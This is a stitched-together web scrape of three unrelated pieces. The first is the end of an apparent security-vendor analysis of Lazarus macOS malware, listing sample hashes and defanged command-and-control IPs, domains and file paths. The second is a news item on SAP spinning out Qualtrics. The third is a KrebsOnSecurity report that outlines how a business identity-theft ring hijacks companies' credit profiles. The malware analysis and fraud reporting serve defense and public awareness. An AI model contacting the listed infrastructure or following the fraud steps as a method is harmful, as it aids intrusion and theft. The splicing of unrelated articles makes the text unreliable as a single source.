The osxari backdoor is itself an evolution of an older Lazarus-related executable ‘Flash Player’ distributed in the malicous Album.app. Here we see the same basic methods and use of libcurl in Album.app’s executable, ‘Flash Player’, but there’s been a few revisions in the 2020 code:

(left: Flash Player; right: osxari):

After osxari, all later samples of OSX.Casso begin to include the reverse shell. Unlike the older Flash Player sample, none include a hardcoded persistence LaunchAgent or LaunchDaemon.

4. Emerging Threats | WatchCat and MediaRemote

As this post was in preparation, an update to Apple’s XProtect signatures late last week revealed yet another Lazarus group Mach-O that differs significantly from those discussed above.

Two new rules in XProtect identify yet another User Agent string, this time specifying older versions of both macOS and Safari:

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15

The rules also specify strings for “MediaRemote.app” and “com.apple.watchcat.plist”. Searches on VirusTotal have only revealed one sample so far:

3bb96bfaf492782b38985f4bd6b7e7f9dc22c1332b42bb74b16041298fd31f93

Detections have been increasing rapidly over the last 14 days as signature-based solutions have caught up:

Although there are some overlaps with the earlier backdoor samples (e.g, the use of “/usr/lib/libcurl.4.dylib”), and the trojanized OTP apps (e.g., inclusion of a hardcoded LaunchDaemon), there is also much more to this malware that has not been seen in the other samples, including use of a WebShell and an onboard crc32 table for decrypting a config file.


The symbol table also reveals an old friend from earlier Lazarus campaigns, _MsgTroyInfo.


While analysis of watchcat is still ongoing and we have yet to see an in-the-wild infection, it’s clear that the rapid iteration of all these various Lazarus-related malware samples shows the actor is heavily invested in the macOS platform.

Conclusion

All of the samples reviewed above have appeared in the last eight to ten weeks and are evidence that threat actors behind the Lazarus group are pursuing several distinct campaigns, using a variety of technologies, and are themselves keeping up-to-date with the Apple platform. These are not actors merely porting Windows malware to macOS, but rather Mac-specific developers deeply invested in writing custom malware for Apple’s platform. Primarily, the samples we have reviewed here appear to be designed to steal cryptocurrency and maintain backdoors into their targets’ devices, but there is clearly much more to be learned about these campaigns. The SentinelOne Platform protects users against all the samples reviewed in this post. For more information about the SentinelOne macOS agent, see here.

IOCS & Samples

899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 TinkaOTP.dmg
326d7836d580c08cf4b5e587434f6e5011ebf2284bbf3e7c083a8f41dac36ddd CoinGoTradeUpgradeDaemon
4f9d2087fadbf7a321a4fbd8d6770a7ace0e4366949b4cfc8cbeb1e9427c02da CoinGoTradeUpgradeDaemon
a61ecbe8a5372c85dcf5d077487f09d01e144128243793d2b97012440dcf106e Cryptoistic Mach-O
8783f6755fd3d478fc58040da03d056f9cad12f199ec4dcd90632c6804e0e643 Cryptoistic.dmg
d91c233b2f1177357387c29d92bd3f29fab7b90760e59a893a0f447ef2cb4715 Album.app.zip
735365ef9aa6cca946cfef9a4b85f68e7f9f03011da0cf5f5ab517a381e40d02 Flash Player
3c2f7b8a167433c95aa919da9216f0624032ac9ed9dec71c3c56cacfd5cd1837 OSX.Casso (osxari)
e63640c53204a59ba59f2c310964149ca3616d79adc40a6c3abd5bf669511756 OSX.Casso
65cc7663fa5c5665ad5d9c6bec2b6257612f9f0c0ce7e4399e6dc8b464ea88c0 OSX.Casso
035089b4ef4a981f43455ebee7963af9e7502170ca206458f96be668b1e3674a OSX.Casso (packed)
85d7379b7b82d6b7868f64203a444a5098c72ed7ccff6d1dbb536389a5be5a9c OSX.Casso
2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b OSX.Casso (cassoosx)
90ea1c7806e2d638f4a942b36a533a1da61adedd05a6d80ea1e09527cf2d839b Casso.exe
3bb96bfaf492782b38985f4bd6b7e7f9dc22c1332b42bb74b16041298fd31f93 watchcat
36683ce8ec4ab6c07330930b523ee0d68b2b410f654a30c70250da890cfbf3c9 iContact

67[.]43.239.146:443
185[.]62.58.207:443
160[.]20.147.253/8443

hxxps[:]//fudcitydelivers[.]com
hxxps[:]//sctemarkets[.]com
hxxps[:]//lastedforcast[.]com
hxxps[:]//audiopodcasts[.]co
hxxps[:]//loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001
hxxp[:]//applepkg[.]com/product/new/iContact.pkg

/tmp/.signal_tmp
/private/tmp/updatecoingotrade
/Library/Application Support/CoinGoTradeService/CoinGoTradeUpgradeDaemon


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

SAP will spin out its $8B spin-in Qualtrics acquisition

Well, this isn’t a story you see every day.

Less than two years after German software giant SAP snatched experience management platform Qualtrics for $8 billion days before the startup’s IPO debut, it has now decided to spin out the company in a brand new IPO.

In a press statement released Sunday, SAP said that Qualtrics had seen cloud growth “in excess of 40 percent” in a quote attributed to SAP CEO Christian Klein. The company will continue to be run by founder and former CEO Ryan Smith, who joined SAP with Qualtrics and led the organization within the German conglomerate.

SAP will retain majority ownership of the new spin out. Interestingly, the statement noted that “Ryan Smith intends to be Qualtrics’ largest individual shareholder.”

SAP’s press statement is vague, but the implication is that the move will offer Qualtrics more flexibility to engage with customers and partners outside of its parent company’s dominion.

I am sure my Equity colleague Alex Wilhelm will have much more to analyze tomorrow with his The Exchange column, but SAP’s rapid about-face on the acquisition is a major surprise. While private equity firms will take a company private and sometimes quickly turn it around in an IPO, it is rare to see a large company like SAP make such a dramatic last-minute bid for a company only to reverse that decision just months later.

Given the heated market for SaaS markets these days though, the path seems clear for Qualtrics’ return to the public markets, particularly if the soon-to-be independent company’s metrics have held up since we last saw its financials. As Wilhelm and his Crunchbase news team wrote back during its S-1 filing:

Qualtrics, unlike most companies going public this year, isn’t a trash fire of losses incurred under the name of growth. It shows that you can grow, and not lose every one of the dollars you have at the same time.

“Isn’t a trash fire” was a high bar back then, but Qualtrics was indeed an outperformer of its peer group. Assuming those fundamentals haven’t changed, it looks like a real win for Qualtrics and Smith, and a save by SAP from whatever strategic plan they decided to change midstream.

Business ID Theft Soars Amid COVID Closures

Identity thieves who specialize in running up unauthorized lines of credit in the names of small businesses are having a field day with all of the closures and economic uncertainty wrought by the COVID-19 pandemic, KrebsOnSecurity has learned. This story is about the victims of a particularly aggressive business ID theft ring that’s spent years targeting small businesses across the country and is now pivoting toward using that access for pandemic assistance loans and unemployment benefits.

Most consumers are likely aware of the threat from identity theft, which occurs when crooks apply for new lines of credit in your name. But the same crime can be far more costly and damaging when thieves target small businesses. Unfortunately, far too many entrepreneurs are simply unaware of the threat or don’t know how to be watchful for it.

What’s more, with so many small enterprises going out of business or sitting dormant during the COVID-19 pandemic, organized fraud rings have an unusually rich pool of targets to choose from.

Short Hills, N.J.-based Dun & Bradstreet [NYSE:DNB] is a data analytics company that acts as a kind of de facto credit bureau for companies: When a business owner wants to open a new line of credit, creditors typically check with Dun & Bradstreet to gauge the business’s history and trustworthiness.

In 2019, Dun & Bradstreet saw more than a 100 percent increase in business identity theft. For 2020, the company estimates an overall 258 percent spike in the crime. Dun & Bradstreet said that so far this year it has received over 4,700 tips and leads where business identity theft or malfeasance are suspected.

“The ferocity of cyber criminals to take advantage of COVID-19 uncertainties by preying on small businesses is disturbing,” said Andrew LaMarca, who leads the global high-risk and fraud team at Dun & Bradstreet.

For the past several months, Milwaukee, Wisc. based cyber intelligence firm Hold Security has been monitoring the communications between and among a businesses ID theft gang apparently operating in Georgia and Florida but targeting businesses throughout the United States. That surveillance has helped to paint a detailed picture of how business ID thieves operate, as well as the tricks they use to gain credit in a company’s name.

Hold Security founder Alex Holden said the group appears to target both active and dormant or inactive small businesses. The gang typically will start by looking up the business ownership records at the Secretary of State website that corresponds to the company’s state of incorporation. From there, they identify the officers and owners of the company, acquire their Social Security and Tax ID numbers from the dark web and other sources online.

To prove ownership over the hijacked firms, they hire low-wage image editors online to help fabricate and/or modify a number of official documents tied to the business — including tax records and utility bills.

The scammers frequently then file phony documents with the Secretary of State’s office in the name(s) of the business owners, but include a mailing address that they control. They also create email addresses and domain names that mimic the names of the owners and the company to make future credit applications appear more legitimate, and submit the listings to business search websites, such as yellowpages.com.

For both dormant and existing businesses, the fraudsters attempt to create or modify the target company’s accounts at Dun & Bradstreet. In some cases, the scammers create dashboard accounts in the business’s names at Dun & Bradstreet’s credit builder portal; in others, the bad guys have actually hacked existing business accounts at DNB, requesting a new DUNS numbers for the business (a DUNS number is a unique, nine-digit identifier for businesses).

Finally, after the bogus profiles are approved by Dun & Bradstreet, the gang waits a few weeks or months and then starts applying for new lines of credit in the target business’s name at stores like Home Depot, Office Depot and Staples. Then they go on a buying spree with the cards issued by those stores.

Usually, the first indication a victim has that they’ve been targeted is when the debt collection companies start calling.

“They are using mostly small companies that are still active businesses but currently not operating because of COVID-19,” Holden said. “With this gang, we see four or five people working together. The team leader manages the work between people. One person seems to be in charge of getting stolen cards from the dark web to pay for the reactivation of businesses through the secretary of state sites. Another team member works on revising the business documents and registering them on various sites. The others are busy looking for specific businesses they want to revive.”

Holden said the gang appears to find success in getting new lines of credit with about 20 percent of the businesses they target.

“One’s personal credit is nothing compared to the ability of corporations to borrow money,” he said. “That’s bad because while the credit system may be flawed for individuals, it’s an even worse situation on average when we’re talking about businesses.”

Holden said over the past few months his firm has seen communications between the gang’s members indicating they have temporarily shifted more of their energy and resources to defrauding states and the federal government by filing unemployment insurance claims and apply for pandemic assistance loans with the Small Business Administration.

“It makes sense, because they’ve already got control over all these dormant businesses,” he said. “So they’re now busy trying to get unemployment payments and SBA loans in the names of these companies and their employees.”

PHANTOM OFFICES

Hold Security shared data intercepted from the gang that listed the personal and financial details of dozens of companies targeted for ID theft, including Dun & Bradstreet logins the crooks had created for the hijacked businesses. Dun & Bradstreet declined to comment on the matter, other than to say it was working with federal and state authorities to alert affected businesses and state regulators.

Among those targeted was Environmental Safety Consultants Inc. (ESC), a 37-year-old environmental engineering firm based in Bradenton, Fla. ESC owner Scott Russell estimates his company was initially targeted nearly two years ago, and that he first became aware something wasn’t right when he recently began getting calls from Home Depot’s corporate offices inquiring about the company’s delinquent account.

But Russell said he didn’t quite grasp the enormity of the situation until last year, when he was contacted by a the manager of a virtual office space across town who told him about a suspiciously large number of deliveries at an office space that was rented out in his name.

Russell had never rented that particular office. Rather, the thieves had done it for him, using his name and the name of his business. The office manager said the deliveries came virtually non-stop, even though there was apparently no business operating within the rented premises. And in each case, shortly after the shipments arrived someone would show up and cart them away.

“She said we don’t think it’s you,” he recalled. “Turns out, they had paid for a lease in my name with someone else’s credit card. She shared with me a copy of the lease, which included a fraudulent ID and even a vehicle insurance card for a Land Cruiser we got rid of like 15 years ago. The application listed our home address with me and some woman who was not my wife’s name.”

The crates and boxes being delivered to his erstwhile office space were mostly computers and other high-priced items ordered from 10 different Office Depot credit cards that also were not in his name.

“The total value of the electronic equipment that was bought and delivered there was something like $75,000,” Russell said, noting that it took countless hours and phone calls with Office Depot to make it clear they would no longer accept shipments addressed to him or his company. “It was quite spine-tingling to see someone penned a lease in the name of my business and personal identity.”

Even though the virtual office manager had the presence of mind to take photocopies of the driver’s licenses presented by the people arriving to pick up the fraudulent shipments, the local police seemed largely uninterested in pursuing the case, Russell said.

“I went to the local county sheriff’s office and showed them all the documentation I had and the guy just yawned and said he’d get right on it,” he recalled. “The place where the office space was rented was in another county, and the detective I spoke to there about it was interested, but he could never get anyone from my county to follow up.”

RECYCLING VICTIMS

Russell said he believes the fraudsters initially took out new lines of credit in his company’s name and then used those to defraud others in a similar way. One of those victims is another victim on the gang’s target list obtained by Hold Security — Mary McMahan, owner of Fan Experiences, an event management company in Winter Park, Fla.

McMahan also had stolen goods from Office Depot and other stores purchased in her company’s name and delivered to the same office space rented in Russell’s name. McMahan said she and her businesses have suffered hundreds of thousands of dollars in fraud, and spent nearly as much in legal fees fending off collections firms and restoring her company’s credit.

McMahan said she first began noticing trouble almost four years ago, when someone started taking out new credit cards in her company’s name. At the same time, her business was used to open a new lease on a virtual office space in Florida that also began receiving packages tied to other companies victimized by business ID theft.

“About four years back, they hit my credit hard for a year, getting all these new lines of credit at Home Depot, Office Depot, Office Max, you name it,” she said. “Then they came back again two years ago and hit it hard for another year. They even went to the [Florida Department of Motor Vehicles] to get a driver’s license in my name.”

McMahan said the thieves somehow hacked her DNB account, and then began adding new officers and locations for her business listing.

“They changed the email and mailing address, and even went on Yelp and Google and did the same,” she said.

McMahan said she’s since locked down her personal and business credit to the point where even she would have a tough time getting a new line of credit or mortgage if she tried.

“There’s no way they can even utilize me anymore because there’s so many marks on my credit stating that it’s been stolen” she said. “These guys are relentless, and they recycle victims to defraud others until they figure out they can’t recycle them anymore.”

SAY…THAT’S A NICE CREDIT PROFILE YOU GOT THERE…

McMahan says she, too, has filed multiple reports about the crimes with local police, but has so far seen little evidence that anyone is interested in following up on the matter. For now, she is paying Dun and Bradstreet more than a $100 a month to monitor her business credit profile.

Dun & Bradstreet does offer a free version of credit monitoring called Credit Signal that lets business owners check their business credit scores and any inquiries made in the previous 14 days up to four times a year. However, those looking for more frequent checks or additional information about specific credit inquiries beyond 14 days are steered toward DNB’s subscription-based services.

Eva Velasquez, president of the Identity Theft Resource Center, a California-based nonprofit that assists ID theft victims, said she finds that troubling.

“When we look at these institutions that are necessary for us to operate and function in society and they start to charge us a fee for a service to fix a problem they helped create through their infrastructure, that’s just unconscionable,” Velasquez said. “We need to take a hard look at the infrastructures that businesses are beholden to and make sure the risk minimization protections they’re entitled to are not fee-based — particularly if it’s a problem created by the very infrastructure of the system.”

Velasquez said it’s unfortunate that small business owners don’t have the same protections afforded to consumers. For example, only recently did the three major consumer reporting bureaus allow all U.S. residents to place a freeze on their credit files for free.

“We’ve done a good job in educating the public that anyone can be victim of identity theft, and in compelling our infrastructure to provide robust consumer protection and risk minimization processes that are more uniform,” she said. “It’s still not good by any means, but it’s definitely better for consumers than it is for businesses. We currently put all the responsibility on the small business owner, and very little on the infrastructure and processes that should be designed to protect them but aren’t doing a great job, frankly.”

Rather, the onus continues to be on the business owner to periodically check with DNB and state agencies to monitor for any signs of unauthorized changes. Worse still, too many private and public organizations still don’t do a good enough job protecting employee identification and tax ID numbers that are so often abused in business identity theft, Velasquez said.

“You can put alerts and other protections in place but the problem is you have to go on a department by department and case by case basis,” she said. “The place to begin is your secretary of state’s office or wherever you file your documents to operate your business.

For its part, Dun & Bradstreet recently published a blog post outlining recommendations for businesses to ward off identity thieves. DNB says anyone who suspects fraudulent activity on their account should contact its support team.